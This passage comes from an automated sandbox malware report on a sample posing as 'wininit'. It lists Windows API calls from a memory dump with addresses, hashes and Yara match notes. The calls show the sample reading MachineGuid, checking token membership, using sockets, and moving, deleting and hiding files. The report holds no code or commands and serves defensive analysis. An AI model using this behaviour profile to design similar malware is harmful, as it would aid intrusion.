                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                  • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 1425999871-0
                                                  • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                  • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                  APIs
                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CheckMembershipToken
                                                  • String ID:
                                                  • API String ID: 1351025785-0
                                                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                  APIs
                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  • SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3318767951-0
                                                  • Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                  • Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
                                                  • Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                  • Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8
                                                  APIs
                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateFolderPathProcess
                                                  • String ID:
                                                  • API String ID: 398210565-0
                                                  • Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                  • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                                                  • Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                  • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateDirectory
                                                  • String ID:
                                                  • API String ID: 4241100979-0
                                                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                  APIs
                                                  • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1721193555-0
                                                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                  • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                                                  • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                  • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                                                  APIs
                                                  • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                  • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                                                  • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                  • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                                                  APIs
                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                  APIs
                                                  • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum
                                                  • String ID:
                                                  • API String ID: 2928410991-0
                                                  • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                  • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                                                  • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                  • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                                                  APIs
                                                  • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                  APIs
                                                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                  • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                                                  • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                  • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                                                  APIs
                                                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                  APIs
                                                  • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID:
                                                  • API String ID: 1174141254-0
                                                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                  APIs
                                                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                  APIs
                                                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                  APIs
                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                    • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                  • GetLastError.KERNEL32 ref: 00404585
                                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                    • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                                                  • String ID:
                                                  • API String ID: 4065557613-0
                                                  • Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                  • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                                                  • Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                  • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                                                  APIs
                                                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                  APIs
                                                  • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                  APIs
                                                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 0040438F
                                                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                  • VariantInit.OLEAUT32(?), ref: 004043C4
                                                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                  • VariantInit.OLEAUT32(?), ref: 00404414
                                                  • SysAllocString.OLEAUT32(?), ref: 00404419
